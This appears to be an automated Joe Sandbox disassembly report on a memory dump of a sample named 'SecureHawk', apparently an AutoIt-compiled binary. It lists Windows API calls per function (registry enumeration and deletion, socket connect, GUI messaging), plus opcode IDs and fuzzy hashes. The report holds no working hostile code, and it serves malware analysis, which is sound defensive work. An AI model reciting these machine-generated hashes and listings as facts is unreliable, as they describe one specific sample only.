                                  • Instruction Fuzzy Hash: F8416975A04248EFDB26DF50D884EAABBF8FB09314F058169ED1A97360D734AD54CFA0
                                  APIs
                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 003713F9
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00371423
                                  • FreeLibrary.KERNEL32(00000000), ref: 003714DA
                                    • Part of subcall function 003713CA: RegCloseKey.ADVAPI32(?), ref: 00371440
                                    • Part of subcall function 003713CA: FreeLibrary.KERNEL32(?), ref: 00371492
                                    • Part of subcall function 003713CA: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003714B5
                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 0037147D
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                  • String ID:
                                  • API String ID: 395352322-0
                                  • Opcode ID: 3032f762eb4ed18a02748fac6d17279a71c8c01c59eb5a4f166f518a115c1aed
                                  • Instruction ID: 64b510ac3a89ea61f1728bb92000cc187bbf29528474d846ca824ab1c7350bb8
                                  • Opcode Fuzzy Hash: 3032f762eb4ed18a02748fac6d17279a71c8c01c59eb5a4f166f518a115c1aed
                                  • Instruction Fuzzy Hash: 3F3142B2900209BFDB66DF95DC89EFFB7BCEF08340F0041A9E515A2140E7745E499B60
                                  APIs
                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 003766D9
                                  • GetWindowLongW.USER32(01235888,000000F0), ref: 0037670C
                                  • GetWindowLongW.USER32(01235888,000000F0), ref: 00376741
                                  • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00376773
                                  • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0037679D
                                  • GetWindowLongW.USER32(?,000000F0), ref: 003767AE
                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003767C8
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: LongWindow$MessageSend
                                  • String ID:
                                  • API String ID: 2178440468-0
                                  • Opcode ID: 8fac71ac0b6bdbdd88d0a58daf16148b4ad616b18c4481f9265294d9918afe1e
                                  • Instruction ID: fa3b5f2360283c3824e5a46b4f79301640d5ead1f5e241ffb11cd3a926e5919f
                                  • Opcode Fuzzy Hash: 8fac71ac0b6bdbdd88d0a58daf16148b4ad616b18c4481f9265294d9918afe1e
                                  • Instruction Fuzzy Hash: 563148316006809FDB368F08DCA6F5437E9FB89398F1941A4F609CF2B2CB39A854DB50
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0034E0AD
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0034E0D3
                                  • SysAllocString.OLEAUT32(00000000), ref: 0034E0D6
                                  • SysAllocString.OLEAUT32(?), ref: 0034E0F4
                                  • SysFreeString.OLEAUT32(?), ref: 0034E0FD
                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 0034E122
                                  • SysAllocString.OLEAUT32(?), ref: 0034E130
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                  • String ID:
                                  • API String ID: 3761583154-0
                                  • Opcode ID: 5e1036ef639063f9cd34143fc8d7512496bd89f36c4b99f1fce9fd77192ae8c4
                                  • Instruction ID: da454591994e1796475447b86e7631ddec5ee936c9cc730858abfefcb90d6241
                                  • Opcode Fuzzy Hash: 5e1036ef639063f9cd34143fc8d7512496bd89f36c4b99f1fce9fd77192ae8c4
                                  • Instruction Fuzzy Hash: 2C21B236600209AFAB55DFA9CC88CBB73ECFF08360F058125FA15DF290D670AC858B60
                                  APIs
                                    • Part of subcall function 0036823D: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00368268
                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00366676
                                  • WSAGetLastError.WSOCK32(00000000), ref: 00366685
                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003666BE
                                  • connect.WSOCK32(00000000,?,00000010), ref: 003666C7
                                  • WSAGetLastError.WSOCK32 ref: 003666D1
                                  • closesocket.WSOCK32(00000000), ref: 003666FA
                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00366713
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                  • String ID:
                                  • API String ID: 910771015-0
                                  • Opcode ID: 57e8757284156b7a6ecfe3aea367de3fd16a275f9e7c4bc8d8ee6c37c1b27757
                                  • Instruction ID: 4cc451cf87d94596f275003b2297f73b9f786cf2829ad91e6c34d43a46558f09
                                  • Opcode Fuzzy Hash: 57e8757284156b7a6ecfe3aea367de3fd16a275f9e7c4bc8d8ee6c37c1b27757
                                  • Instruction Fuzzy Hash: D231E871600208AFDB11AF64DC86BBE77ADEF44794F018169FE059B291DB70AD448BA1
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0034E188
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0034E1AE
                                  • SysAllocString.OLEAUT32(00000000), ref: 0034E1B1
                                  • SysAllocString.OLEAUT32 ref: 0034E1D2
                                  • SysFreeString.OLEAUT32 ref: 0034E1DB
                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 0034E1F5
                                  • SysAllocString.OLEAUT32(?), ref: 0034E203
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                  • String ID:
                                  • API String ID: 3761583154-0
                                  • Opcode ID: 8c26863c9f6a749256d7252ffc5a6809c2d234cdff6040200c27695800f8015f
                                  • Instruction ID: 34d209f2b33fe3003a14736bcd0b2da5cfc8f19dfc9b21f68fd3695b6ab18af7
                                  • Opcode Fuzzy Hash: 8c26863c9f6a749256d7252ffc5a6809c2d234cdff6040200c27695800f8015f
                                  • Instruction Fuzzy Hash: CB21B831644208AFDB55AFB9DC89DBA77ECFF09360B008165FA15CF2A0D670EC818B60
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: __wcsnicmp
                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                  • API String ID: 1038674560-2734436370
                                  • Opcode ID: 6a20b60fa0848b0d64ece5f30f0a446ace1e78c73c493a313487779244170107
                                  • Instruction ID: e60fdd2ba8a18e136b2935600f5610ac8be652619c72dc41058b44c70c53cdcf
                                  • Opcode Fuzzy Hash: 6a20b60fa0848b0d64ece5f30f0a446ace1e78c73c493a313487779244170107
                                  • Instruction Fuzzy Hash: 912130321446196ED227B7249882FEB73D8EF59700F584436FC458E582EBA1BE92C395
                                  APIs
                                    • Part of subcall function 002F2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002F214F
                                    • Part of subcall function 002F2111: GetStockObject.GDI32(00000011), ref: 002F2163
                                    • Part of subcall function 002F2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 002F216D
                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00377A1F
                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00377A2C
                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00377A37
                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00377A46
                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00377A52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSend$CreateObjectStockWindow
                                  • String ID: Msctls_Progress32
                                  • API String ID: 1025951953-3636473452
                                  • Opcode ID: 95fc2d0d96a713d80ed5aa32b2e6c070f3b7b04c97d69a167d59afc10ab7caf4
                                  • Instruction ID: 86294d349b7c07b2736490462e329ad0b94cc7eda0bc14b38ad2cde86c3335d8
                                  • Opcode Fuzzy Hash: 95fc2d0d96a713d80ed5aa32b2e6c070f3b7b04c97d69a167d59afc10ab7caf4
                                  • Instruction Fuzzy Hash: 651181B211021DBEEF269E60CC86EEB7F5DEF09798F018115BB08A6151D6759C21DBA0
                                  APIs
                                  • __init_pointers.LIBCMT ref: 00319C46
                                    • Part of subcall function 003132E9: EncodePointer.KERNEL32(00000000), ref: 003132EC
                                    • Part of subcall function 003132E9: __initp_misc_winsig.LIBCMT ref: 00313307
                                    • Part of subcall function 003132E9: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0031A000
                                    • Part of subcall function 003132E9: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0031A014
                                    • Part of subcall function 003132E9: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0031A027
                                    • Part of subcall function 003132E9: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0031A03A
                                    • Part of subcall function 003132E9: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0031A04D
                                    • Part of subcall function 003132E9: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0031A060
                                    • Part of subcall function 003132E9: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0031A073
                                    • Part of subcall function 003132E9: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0031A086
                                    • Part of subcall function 003132E9: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0031A099
                                    • Part of subcall function 003132E9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0031A0AC
                                    • Part of subcall function 003132E9: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0031A0BF
                                    • Part of subcall function 003132E9: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0031A0D2
                                    • Part of subcall function 003132E9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0031A0E5
                                    • Part of subcall function 003132E9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0031A0F8
                                    • Part of subcall function 003132E9: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0031A10B
                                    • Part of subcall function 003132E9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0031A11E
                                  • __mtinitlocks.LIBCMT ref: 00319C4B
                                  • __mtterm.LIBCMT ref: 00319C54
                                    • Part of subcall function 00319CBC: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00319C59,00317E2D,003AB0B8,00000014), ref: 00319DB6
                                    • Part of subcall function 00319CBC: _free.LIBCMT ref: 00319DBD
                                    • Part of subcall function 00319CBC: DeleteCriticalSection.KERNEL32(0B;,?,?,00319C59,00317E2D,003AB0B8,00000014), ref: 00319DDF
                                  • __calloc_crt.LIBCMT ref: 00319C79
                                  • __initptd.LIBCMT ref: 00319C9B
                                  • GetCurrentThreadId.KERNEL32 ref: 00319CA2
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                  • String ID:
                                  • API String ID: 3567560977-0
                                  • Opcode ID: 5ab84067a8f57dc4664b20afb3fbf78bc0b83df6685f3b1c8400f965c03ee13c
                                  • Instruction ID: 4462436110ee6932395d035a1c6044833c75011efa36d2f8563a6ba71f7a324b
                                  • Opcode Fuzzy Hash: 5ab84067a8f57dc4664b20afb3fbf78bc0b83df6685f3b1c8400f965c03ee13c
                                  • Instruction Fuzzy Hash: ADF04F3265A7116DE62F7774BC267C626D49B0A770F21062BF891C90D1EF1184C24290
                                  APIs
                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,003141B2,?), ref: 00314103
                                  • GetProcAddress.KERNEL32(00000000), ref: 0031410A
                                  • EncodePointer.KERNEL32(00000000), ref: 00314116
                                  • DecodePointer.KERNEL32(00000001,003141B2,?), ref: 00314133
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                  • String ID: RoInitialize$combase.dll
                                  • API String ID: 3489934621-340411864
                                  • Opcode ID: 626f958ecfc63cd5ed889c118423d054f8034ff8865cfe132e71b0b74a425fd2
                                  • Instruction ID: ea2a68d499bc77195f48a4f8695f9457f83c7a903b9a932cc0bbae4b06549c95
                                  • Opcode Fuzzy Hash: 626f958ecfc63cd5ed889c118423d054f8034ff8865cfe132e71b0b74a425fd2
                                  • Instruction Fuzzy Hash: D5E01AB4A90300AFDF972FB8EC4DB84366CBB28B0AF5145A4F611E51A0DBF540D88F04
                                  APIs
                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,003140D8), ref: 003141D8
                                  • GetProcAddress.KERNEL32(00000000), ref: 003141DF
                                  • EncodePointer.KERNEL32(00000000), ref: 003141EA
                                  • DecodePointer.KERNEL32(003140D8), ref: 00314205
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                  • String ID: RoUninitialize$combase.dll
                                  • API String ID: 3489934621-2819208100
                                  • Opcode ID: 1a7ccd80ef0c118f47e01eca44bd2395b85854402e124e38a1b6854811af7235
                                  • Instruction ID: 8c2ba65fd8d019c4867e33793f4159e3963a39d5e224fd0b27e6017132d9eaa3
                                  • Opcode Fuzzy Hash: 1a7ccd80ef0c118f47e01eca44bd2395b85854402e124e38a1b6854811af7235
                                  • Instruction Fuzzy Hash: A5E0B67C991314ABDB9B9B64FD0DB843AACBB24B0AF104695F201E21A1CBB44589CB14
                                  APIs
                                  • GetClientRect.USER32(?,?), ref: 002F21B8
                                  • GetWindowRect.USER32(?,?), ref: 002F21F9
                                  • ScreenToClient.USER32(?,?), ref: 002F2221
                                  • GetClientRect.USER32(?,?), ref: 002F2350
                                  • GetWindowRect.USER32(?,?), ref: 002F2369
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Rect$Client$Window$Screen
                                  • String ID:
                                  • API String ID: 1296646539-0
                                  • Opcode ID: 618498f63a069b9b2b1a63b54b030426b1734ea57dd897e6791d7f75947f9d14
                                  • Instruction ID: 96f14011ac734e2cccd67c39503655d8ab67c0d5ccefa57a40aaa70a42ed999a
                                  • Opcode Fuzzy Hash: 618498f63a069b9b2b1a63b54b030426b1734ea57dd897e6791d7f75947f9d14
                                  • Instruction Fuzzy Hash: 19B18B7991024ADBDF10CFA8C4807EEF7B1FF08750F148169EE59AB214EB74AA54CB64
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _memmove$__itow__swprintf
                                  • String ID:
                                  • API String ID: 3253778849-0
                                  • Opcode ID: 340957853b3c3171cca4beac8282df536099dc876b62d2c6f9ea26667f41c8ed
                                  • Instruction ID: b07309b1e427ceb559f8a16f9e008674defc8e30bfef604fa324d2b894b4c4f4
                                  • Opcode Fuzzy Hash: 340957853b3c3171cca4beac8282df536099dc876b62d2c6f9ea26667f41c8ed
                                  • Instruction Fuzzy Hash: B661DF3051025E9BCF16EF60CC82EFE77A8AF08308F448519FD596B1A2DB74A95ACB50
                                  APIs
                                    • Part of subcall function 00301A36: _memmove.LIBCMT ref: 00301A77
                                    • Part of subcall function 00371242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003701D5,?,?), ref: 00371259
                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003706E5
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00370725
                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00370748
                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00370771
                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003707B4
                                  • RegCloseKey.ADVAPI32(00000000), ref: 003707C1
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                  • String ID:
                                  • API String ID: 4046560759-0
                                  • Opcode ID: 7dd0c9fadfebcb45c41670d0696fa94f77abaf7146d65d3466a5d59b3c530c87
                                  • Instruction ID: 36b166a7475252639de1d71c5aea2a3872e457a673eb0dbb41618a23a8bc08e5
                                  • Opcode Fuzzy Hash: 7dd0c9fadfebcb45c41670d0696fa94f77abaf7146d65d3466a5d59b3c530c87
                                  • Instruction Fuzzy Hash: 47518B71108344EFC72AEB64C895E6BB7E8FF84314F00891DF5998B2A1DB31E905CB92
                                  APIs
                                  • GetMenu.USER32(?), ref: 00375C00
                                  • GetMenuItemCount.USER32(00000000), ref: 00375C37
                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00375C5F
                                  • GetMenuItemID.USER32(?,?), ref: 00375CCE
                                  • GetSubMenu.USER32(?,?), ref: 00375CDC
                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00375D2D
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Menu$Item$CountMessagePostString
                                  • String ID:
                                  • API String ID: 650687236-0
                                  • Opcode ID: 406d4df62a7888f97969d52946192ffff1901ef49a3353277ffe1b0a203a9e22
                                  • Instruction ID: 3c1a7a2b8e8b000c167c8881470895cdeea737608f468d6915cde0ab5e13e095
                                  • Opcode Fuzzy Hash: 406d4df62a7888f97969d52946192ffff1901ef49a3353277ffe1b0a203a9e22
                                  • Instruction Fuzzy Hash: C7518575E00619AFCF2AEF94C845AAEB7B4EF48310F118099E905BB351C7B4AE41CF90
                                  APIs
                                  • VariantInit.OLEAUT32(?), ref: 0034F485
                                  • VariantClear.OLEAUT32(00000013), ref: 0034F4F7
                                  • VariantClear.OLEAUT32(00000000), ref: 0034F552
                                  • _memmove.LIBCMT ref: 0034F57C
                                  • VariantClear.OLEAUT32(?), ref: 0034F5C9
                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0034F5F7
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
